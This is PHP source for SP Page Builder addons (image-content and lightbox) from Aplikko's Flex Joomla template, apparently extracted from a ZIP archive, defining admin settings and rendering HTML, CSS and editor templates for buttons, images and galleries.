				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
				'values'=>array(
					''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
					'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
					'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
					'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
					'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
				),
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_shape'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
				'values'=>array(
					'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
					'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
					'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
				),
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_block'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
				'values'=>array(
					''=>JText::_('JNO'),
					'sppb-btn-block'=>JText::_('JYES'),
				),
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),
			
			'peicon_name'=>array( // Pixeden Icons
				'type'=>'select', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
				'values'=> $peicon_list,
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_icon'=>array(
				'type'=>'icon',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_DESC'),
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_icon_position'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
				'values'=>array(
					'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
					'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
				),
				'depends'=> array(
					array('button_text', '!=', ''),
				),
			),
			'button_margin_top'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN_TOP'),
				'std'=>array('md'=>20, 'sm'=>15, 'xs'=>10),
				'responsive'=>true,
				'max'=>400,
				'depends'=> array(
					array('button_text', '!=', ''),
				),
			),

			'content_padding'=>array(
				'type'=>'padding',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
				'std'=>array('md'=>'120px 0 120px 50px', 'sm'=>'80px 0 80px 40px', 'xs'=>'20px 0 40px 0px'),
				'responsive' => true
			),

			'class'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
				'std'=>''
			),

		),
	),
	)
);
PK!Ʀ7ĭJ�J0flex/sppagebuilder/addons/image_content/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonImage_content extends SppagebuilderAddons{

	public function render() {

		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);
		
		$settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';

		//Options
		$image = (isset($settings->image) && $settings->image) ? $settings->image : '';
		//$image_src = isset($image->src) ? $image->src : $image;
		$image_alignment = (isset($settings->image_alignment) && $settings->image_alignment) ? $settings->image_alignment : '';
		$image_background_size = (isset($settings->image_background_size) && $settings->image_background_size) ? $settings->image_background_size : 'background-size:contain;';
		$text = (isset($settings->text) && $settings->text) ? $settings->text : '';
		$button_text = (isset($settings->button_text) && $settings->button_text) ? $settings->button_text : '';
		$button_url = (isset($settings->button_url) && $settings->button_url) ? $settings->button_url : '';
		$button_classes = (isset($settings->button_size) && $settings->button_size) ? ' sppb-btn-' . $settings->button_size : '';
		$button_classes .= (isset($settings->button_type) && $settings->button_type) ? ' sppb-btn-' . $settings->button_type : '';
		$button_classes .= (isset($settings->button_shape) && $settings->button_shape) ? ' sppb-btn-' . $settings->button_shape: ' sppb-btn-rounded';
		$button_classes .= (isset($settings->button_appearance) && $settings->button_appearance) ? ' sppb-btn-' . $settings->button_appearance : '';
		$button_classes .= (isset($settings->button_block) && $settings->button_block) ? ' ' . $settings->button_block : '';
		//Pixeden Icons
		$peicon_name = (isset($settings->peicon_name) && $settings->peicon_name) ? $settings->peicon_name : '';
		$button_icon = (isset($settings->button_icon) && $settings->button_icon) ? $settings->button_icon : '';
		$button_icon_position = (isset($settings->button_icon_position) && $settings->button_icon_position) ? $settings->button_icon_position: 'left';
		$button_position = (isset($settings->button_position) && $settings->button_position) ? $settings->button_position : '';
		$button_attribs = (isset($settings->button_target) && $settings->button_target) ? ' rel="noopener noreferrer" target="' . $settings->button_target . '"' : '';
		$button_attribs .= (isset($settings->button_url) && $settings->button_url) ? ' href="' . $settings->button_url . '"' : '';
		
		$title_margin_top = (isset($this->addon->settings->title_margin_top) && $this->addon->settings->title_margin_top) ? $this->addon->settings->title_margin_top : '';
		$title_margin_bottom = (isset($this->addon->settings->title_margin_bottom) && $this->addon->settings->title_margin_bottom) ? $this->addon->settings->title_margin_bottom : '';
		
		//$button_margin_top = (isset($settings->button_margin_top) && $settings->button_margin_top) ? ' style="margin-top:'. $settings->button_margin_top .'px;"' : ' style="margin-top:15px;margin-bottom:10px;"';

		
		//$title_margin_bottom !='' ? $button_top_margin = ' style="margin-top:' . ( (int) $title_margin_bottom - 10 ) . 'px;margin-bottom:' . ( (int) $title_margin_bottom - 10 ) . 'px;"' : $button_top_margin = ' style="margin-top:15px;margin-bottom:10px;"';

		$icon_arr = array_filter(explode(' ', $button_icon));
		if (count($icon_arr) === 1) {
			$button_icon = 'fa ' . $button_icon;
		}
		
		if($button_icon_position == 'left') {	
			if ($peicon_name != '') {
				$button_text = ($peicon_name) ? '<i class="pe ' . $peicon_name . ' left" aria-hidden="true"></i> ' . $button_text : $button_text;
			}else{
				$button_text = ($button_icon) ? '<i class="' . $button_icon . ' left" aria-hidden="true"></i> ' . $button_text : $button_text;
			}
		} else {
			if ($peicon_name != '') {
				$button_text = ($peicon_name) ? $button_text . ' <i style="margin-left:6px;margin-right:-2px;" class="pe ' . $peicon_name . ' right" aria-hidden="true"></i>' : $button_text;
			}else{
				$button_text = ($button_icon) ? $button_text . ' <i class="' . $button_icon . ' right" aria-hidden="true"></i>' : $button_text;
			}
		}
		
		$button_output = '';
		
		if ($button_text != '') {
			$button_output = '<a'. $button_attribs . ' id="btn-'. $this->addon->id .'" class="sppb-btn' . $button_classes . '">' . $button_text . '</a>';
		}

		if($image_alignment=='left') {
			$content_class = ' col-xs-offset-0 col-sm-offset-6';
		} else {
			$content_class = '';
		}

		if($image && $text) {

			$output = '<div class="sppb-addon sppb-addon-image-content aligment-'. $image_alignment .' clearfix ' . $class . '">';
			
				// Image
				if(strpos($image, 'http://') !== false || strpos($image, 'https://') !== false){
					/* Lazyload for images with absolute URL */
					if($has_lazyload) {
						$output .= '<div style="background-image: url(data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==);background-size:'.$image_background_size.';background-repeat:no-repeat;" class="lazyload sppb-image-holder" data-bg="'. $image .'" data-expand="-5" role="img" aria-label="'. strip_tags($title) .'">';
					} else {
						$output .= '<div style="background-image: url(' . $image . ');background-size:'.$image_background_size.';background-repeat:no-repeat;" class="sppb-image-holder" role="img" aria-label="'. strip_tags($title) .'">';
					}
				} else {
					/* Lazyload for images for relative URL (local image) */
					if($has_lazyload) {
						$output .= '<div style="background-image: url(data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==);background-size:'.$image_background_size.';background-repeat:no-repeat;" class="lazyload sppb-image-holder" data-bg="'. JUri::root() . $image .'" data-expand="-5" role="img" aria-label="'. strip_tags($title) .'">';
					} else {
						$output .= '<div style="background-image: url(' . JURI::base(true) . '/' . $image . ');background-size:'.$image_background_size.';background-repeat:no-repeat;" class="sppb-image-holder" role="img" aria-label="'. strip_tags($title) .'">';
					}
				}
				$output .= '</div>';
		
				// Content
				$output .= '<div class="container-fluid">';
				$output .= '<div class="row-fluid">';
	
				// Important to have Bootstrap's col-sm- instead of SPPB's sppb-col-sm-, to fix issues with SPPB 3.x
				$output .= '<div class="col-xs-12 col-sm-6'. $content_class .'">';
				$output .= '<div class="sppb-content-holder">';
				$output .= ($title) ? '<'.$heading_selector.' class="sppb-image-content-title sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
				$output .= ($text) ? '<p class="sppb-image-content-text">' . $text . '</p>' : '';
	
				$output .= $button_output;
	
				$output .= '</div>';
				$output .= '</div>';
				$output .= '</div>';
				$output .= '</div>';

			$output .= '</div>';
			
			return $output;

		}

		return;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
		$css_path = new JLayoutFile('addon.css.button', $layout_path);
		$settings = $this->addon->settings;
		$css = '';
		
		$button_margin_top = (isset($settings->button_margin_top)) ? 'margin-top:' . $settings->button_margin_top.'px;' : '';
		$button_margin_top_sm = (isset($settings->button_margin_top_sm)) ? 'margin-top:' . $settings->button_margin_top_sm.'px;' : '';
		$button_margin_top_xs = (isset($settings->button_margin_top_xs)) ? 'margin-top:' . $settings->button_margin_top_xs.'px;' : '';
		
		
		//margin-top:15px;margin-bottom:10px;
	
		$css .= (!empty($button_margin_top)) ? $addon_id . ' #btn-' . $this->addon->id .' {' . $button_margin_top . '}' : $addon_id . ' #btn-' . $this->addon->id .' {margin-top:15px;margin-bottom:10px;}';
		
		if(!empty($button_margin_top_sm)) {
			$css .= '@media (min-width: 768px) and (max-width: 991px) {'. $addon_id . ' #btn-' . $this->addon->id .' {' . $button_margin_top_sm . '}}';
		}
		if(!empty($button_margin_top_xs)) {
			$css .= '@media (max-width: 767px) {'. $addon_id . ' #btn-' . $this->addon->id .' {' . $button_margin_top_xs . '}}';
		}
		

		$padding = (isset($settings->content_padding)) ? SppagebuilderHelperSite::getPaddingMargin($settings->content_padding, 'padding') : '';
		$padding_sm = (isset($settings->content_padding_sm)) ? SppagebuilderHelperSite::getPaddingMargin($settings->content_padding_sm, 'padding') : '';
		$padding_xs = (isset($settings->content_padding_xs)) ? SppagebuilderHelperSite::getPaddingMargin($settings->content_padding_xs, 'padding') : '';

		
		$css .= (!empty($padding)) ? $addon_id .' .sppb-addon-image-content .sppb-content-holder{'.$padding.'}' : '';
		$css .= (!empty($padding_sm)) ? '@media (min-width: 768px) and (max-width: 991px) {'.$addon_id.' .sppb-addon-image-content .sppb-content-holder{'.$padding_sm.'}}' : '';
		$css .= (!empty($padding_xs)) ? '@media (max-width: 767px) {'.$addon_id.' .sppb-addon-image-content .sppb-content-holder{'.$padding_xs.'}}' : '';
			
			

		$css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $settings, 'id' => 'btn-' . $this->addon->id));

		return $css;
	}

	public static function getTemplate() {
		$output = '
		<#
			var content_class = "";
			if(data.image_alignment == "left") {
				content_class = " sppb-col-sm-offset-6";
			}

			var button_text = data.button_text;
			let icon_arr = (typeof data.button_icon !== "undefined" && data.button_icon) ? data.button_icon.split(" ") : "";
			let icon_name = icon_arr.length === 1 ? "fa "+data.button_icon : data.button_icon;

			
			if(data.button_icon_position == "left") {
				if (data.peicon_name != "") {
					button_text = (data.peicon_name) ? \' <i class="pe \' + data.peicon_name + \' left"></i>\' + data.button_text : data.button_text;
				}else{
					button_text = (data.button_icon) ? \' <i class="fa \' + data.button_icon + \' left"></i>\' + data.button_text : data.button_text;
				}
			} else {
				if (data.peicon_name != "") {
					button_text = (data.peicon_name) ? data.button_text + \' <i style="margin-left:6px;margin-right:-2px;" class="pe \' + data.peicon_name + \' right"></i>\' : data.button_text;
				}else{
					button_text = (data.button_icon) ? data.button_text + \' <i class="fa \' + data.button_icon + \' right"></i>\' : data.button_text;
				}
			}

			var button_classes = "";

			if(data.button_size){
				button_classes = button_classes + " sppb-btn-" + data.button_size;
			}

			if(data.button_type){
				button_classes = button_classes + " sppb-btn-" + data.button_type;
			}

			if(data.button_shape){
				button_classes = button_classes + " sppb-btn-" + data.button_shape;
			} else {
				button_classes = button_classes + " sppb-btn-rounded";
			}

			if(data.button_appearance){
				button_classes = button_classes + " sppb-btn-" + data.button_appearance;
			}

			if(data.button_block){
				button_classes = button_classes + " " + data.button_block;
			}

			var button_fontstyle = data.button_font_style || "";

			var padding = "";
			var padding_sm = "";
			var padding_xs = "";
			if(data.content_padding){
				if(_.isObject(data.content_padding)){
					if(data.content_padding.md.trim() !== ""){
						padding = data.content_padding.md.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(data.content_padding.sm.trim() !== ""){
						padding_sm = data.content_padding.sm.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(data.content_padding.xs.trim() !== ""){
						padding_xs = data.content_padding.xs.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				}
			}
		#>
		<style type="text/css">
			<#
				var img = {}
				if (typeof data.image !== "undefined" && typeof data.image.src !== "undefined") {
					img = data.image
				} else {
					img = {src: data.image}
				}
			#>
			#sppb-addon-{{ data.id }} .sppb-image-holder{
				<# if(img.src.indexOf("https://") == -1 && img.src.indexOf("https://") == -1){ #>
					background-image: url({{ pagebuilder_base + img.src }});
					background-size:{{ data.image_background_size }};
				<# } else { #>
					background-image: url({{ img.src }});
					background-size:{{ data.image_background_size }};
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-addon-image-content .sppb-content-holder{
				padding: {{ padding }};
			}
			
			#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-{{ data.button_type }}{
				letter-spacing: {{ data.button_letterspace }};
				<# if(typeof data.button_margin_top !== "undefined" && typeof data.button_margin_top.md !== "undefined"){ #>
					margin-top: {{ data.button_margin_top.md }}px;
					box-shadow: 0 4px 22px red;
				<# } #>
				<# if(_.isObject(button_fontstyle)) { #>
					<# if(button_fontstyle.underline == 1){ #>
						text-decoration: underline;
					<# } #>
					<# if(button_fontstyle.uppercase == 1){ #>
						text-transform: uppercase;
					<# } #>
					<# if(button_fontstyle.italic == 1){ #>
						font-style: italic;
					<# } #>
					<# if(button_fontstyle.weight == 100){ #>
						font-weight: 100;
					<# } else if(button_fontstyle.weight == 200){#>
						font-weight: 200;
					<# } else if(button_fontstyle.weight == 300){#>
						font-weight: 300;
					<# } else if(button_fontstyle.weight == 400){#>
						font-weight: 400;
					<# } else if(button_fontstyle.weight == 500){#>
						font-weight: 500;
					<# } else if(button_fontstyle.weight == 600){#>
						font-weight: 600;
					<# } else if(button_fontstyle.weight == 700){#>
						font-weight: 700;
					<# } else if(button_fontstyle.weight == 800){#>
						font-weight: 800;
					<# } else if(button_fontstyle.weight == 900){#>
						font-weight: 900;
					<# } #>
				<# } #>
			}

			<# if(data.button_type == "custom"){ #>
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
					color: {{ data.button_color }};
					<# if(data.button_appearance == "outline"){ #>
						border-color: {{ data.button_background_color }}
					<# } else if(data.button_appearance == "3d"){ #>
						border-bottom-color: {{ data.button_background_color_hover }};
						background-color: {{ data.button_background_color }};
					<# } else if(data.button_appearance == "gradient"){ #>
						border: none;
						<# if(typeof data.button_background_gradient.type !== "undefined" && data.button_background_gradient.type == "radial"){ #>
							background-image: radial-gradient(at {{ data.button_background_gradient.radialPos || "center center"}}, {{ data.button_background_gradient.color }} {{ data.button_background_gradient.pos || 0 }}%, {{ data.button_background_gradient.color2 }} {{ data.button_background_gradient.pos2 || 100 }}%);
						<# } else { #>
							background-image: linear-gradient({{ data.button_background_gradient.deg || 0}}deg, {{ data.button_background_gradient.color }} {{ data.button_background_gradient.pos || 0 }}%, {{ data.button_background_gradient.color2 }} {{ data.button_background_gradient.pos2 || 100 }}%);
						<# } #>
					<# } else { #>
						background-color: {{ data.button_background_color }};
					<# } #>
				}

				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom:hover{
					color: {{ data.button_color_hover }};
					background-color: {{ data.button_background_color_hover }};
					<# if(data.appearance == "outline"){ #>
						border-color: {{ data.button_background_color_hover }};
					<# } else if(data.button_appearance == "gradient"){ #>
						<# if(typeof data.button_background_gradient_hover.type !== "undefined" && data.button_background_gradient_hover.type == "radial"){ #>
							background-image: radial-gradient(at {{ data.button_background_gradient_hover.radialPos || "center center"}}, {{ data.button_background_gradient_hover.color }} {{ data.button_background_gradient_hover.pos || 0 }}%, {{ data.button_background_gradient_hover.color2 }} {{ data.button_background_gradient_hover.pos2 || 100 }}%);
						<# } else { #>
							background-image: linear-gradient({{ data.button_background_gradient_hover.deg || 0}}deg, {{ data.button_background_gradient_hover.color }} {{ data.button_background_gradient_hover.pos || 0 }}%, {{ data.button_background_gradient_hover.color2 }} {{ data.button_background_gradient_hover.pos2 || 100 }}%);
						<# } #>
					<# } #>
				}
			<# } #>

			@media (min-width: 768px) and (max-width: 991px) {
				#sppb-addon-{{ data.id }} .sppb-addon-image-content .sppb-content-holder{
					padding: {{ padding_sm }};
				}
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-{{ data.button_type }}{
					<# if(typeof data.button_margin_top !== "undefined" && typeof data.button_margin_top.sm !== "undefined"){ #>
						margin-top: {{ data.button_margin_top.sm }}px;
					<# } #>
				}
			}
			@media (max-width: 767px) {
				#sppb-addon-{{ data.id }} .sppb-addon-image-content .sppb-content-holder{
					padding: {{ padding_xs }};
				}
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-{{ data.button_type }}{
					<# if(typeof data.button_margin_top !== "undefined" && typeof data.button_margin_top.xs !== "undefined"){ #>
						margin-top: {{ data.button_margin_top.xs }}px;
					<# } #>
				}
			}
		</style>
		<div class="sppb-addon sppb-addon-image-content aligment-{{ data.image_alignment }} clearfix {{ data.class }}">
			<div class="sppb-image-holder"></div>
			<div class="sppb-container">
				<div class="sppb-row">
					<# if(data.image_alignment == "left") { #>
						<div class="sppb-col-sm-6"></div>
					<# } #>
					<div class="sppb-col-sm-6 {{ content_class }}">
						<div class="sppb-content-holder">
                            <# if( !_.isEmpty( data.title ) ){ #><{{ data.heading_selector }} class="sppb-image-content-title sppb-addon-title sp-inline-editable-element" data-id={{data.id}} data-fieldName="title" contenteditable="true">{{ data.title }}</{{ data.heading_selector }}><# } #>
                            <# if(data.text){ #><p id="addon-text-{{data.id}}" class="sppb-image-content-text sp-editable-content" data-id={{data.id}} data-fieldName="text">{{{ data.text }}}</p><# } #>
						    <# if(button_text){ #>
                                <a href=\'{{ data.button_url }}\' target="{{ data.button_target }}" id="btn-{{ data.id }}" class="sppb-btn {{ button_classes }}">{{{ button_text }}}</a>
							<# } #>
						</div>
					</div>
				</div>
			</div>
		</div>
		';

		return $output;
	}

}PK!��TXX,flex/sppagebuilder/addons/lightbox/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'repeatable', 
		'addon_name'=>'sp_lightbox',
		'category'=>'Flex',
		'title'=>JText::_('FLEX_ADDON_IMAGELIGHTBOX'),
		'desc'=>JText::_('FLEX_ADDON_IMAGELIGHTBOX_DESC'),
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  ''
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h4',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontsize'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_lineheight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontstyle'=>array(
					'type'=>'select',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'values'=>array(
						'underline'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UNDERLINE'),
						'uppercase'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UPPERCASE'),
						'italic'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_ITALIC'),
						'lighter'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_LIGHTER'),
						'normal'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_NORMAL'),
						'bold'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLD'),
						'bolder'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLDER'),
					),
					'multiple'=>true,
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontweight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_bottom'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),
				
				'width'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_WIDTH_DESC'),
					'std'=>200
					),
					
				'spacing'=>array(
					'type'=>'number', 
					'title'=>JText::_('FLEX_THUMBNAIL_SPACING'),
					'desc'=>JText::_('FLEX_THUMBNAIL_SPACING_DESC'),
					'std'=>0
				),
				
				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

				// Repeatable Items
				'sp_lightbox_item'=>array(
					'title'=>JText::_('FLEX_GALLERY_ITEMS'),
					'attr'=>array(
						'title'=>array(
							'type'=>'text', 
							'title'=>JText::_('FLEX_ADDON_IMAGELIGHTBOX_ITEM_TITLE'),
							'desc'=>JText::_('FLEX_ADDON_IMAGELIGHTBOX_ITEM_TITLE_DESC'),
							'std'=>'Image 1'
						),
						'show_caption'=>array(
							'type'=>'checkbox', 
							'title'=>JText::_('FLEX_ADDON_IMAGELIGHTBOX_SHOW_CAPTION'),
							'desc'=>JText::_('FLEX_ADDON_IMAGELIGHTBOX_SHOW_CAPTION_DESC'),
							'values'=>array(
								1=>JText::_('JYES'),
								0=>JText::_('JNO'),
							),
							'std'=>1,
						),
						'thumb'=>array(
							'type'=>'media',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_THUMB'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_THUMB_DESC'),
						),
						'full'=>array(
							'type'=>'media',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_FULL'),
							'desc'=>JText::_('FLEX_GALLERY_FULL_DESC'),
						),
					),
				),
			),
		),
	)
);
PK!���tt+flex/sppagebuilder/addons/lightbox/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonLightbox extends SppagebuilderAddons{

	public function render() {
		
		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';

		//Options
		$width = (isset($this->addon->settings->width) && $this->addon->settings->width) ? $this->addon->settings->width : 200;
		$height = (isset($this->addon->settings->height) && $this->addon->settings->height) ? $this->addon->settings->height : 200;
		$spacing = (isset($this->addon->settings->spacing) && $this->addon->settings->spacing) ? $this->addon->settings->spacing : 0;

		
		$output  = '<div class="sppb-addon sppb-addon-lightbox ' . $class . '">';
		$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
		$output .= '<div class="sppb-addon-content">';
		$output .= '<ul id="grid-'.$this->addon->id.'" class="sppb-lightbox clearfix">';
		
		foreach ($this->addon->settings->sp_lightbox_item as $key => $value) {
			
			$class != '' ? $thumb_class = ' class="'.$class.'"' : $thumb_class = '';
			$class == 'small' ? $small = ' small' : $small = '';
			$value->show_caption != 0 ? $caption = $value->title : $caption = '';

			
			if($value->thumb) {
				$output .= ($spacing !='') ? '<li class="shuffle-item'.$small.'" style="margin-bottom:' . $spacing . 'px;">' : '<li class="shuffle-item">';
				$output .= '';
		
				if($value->full) {
					$output .= '<div class="overlay"><a href="'. $value->full .'" data-imagelightbox="imagelightbox">';
					if (($class == 'simple') || ($class == 'small')) {
						$output .= '';
					} else {
						$output .= '<i class="ap-plus-1"></i>';
					}
					$output .= '';
				}
		
				$output .= '<img'.$thumb_class.' src="'. $value->thumb . '" width="' . $width . '" alt="' . $caption . '" />';
		
				if($value->full) {
					$output .= '</div></a>';
				}
		
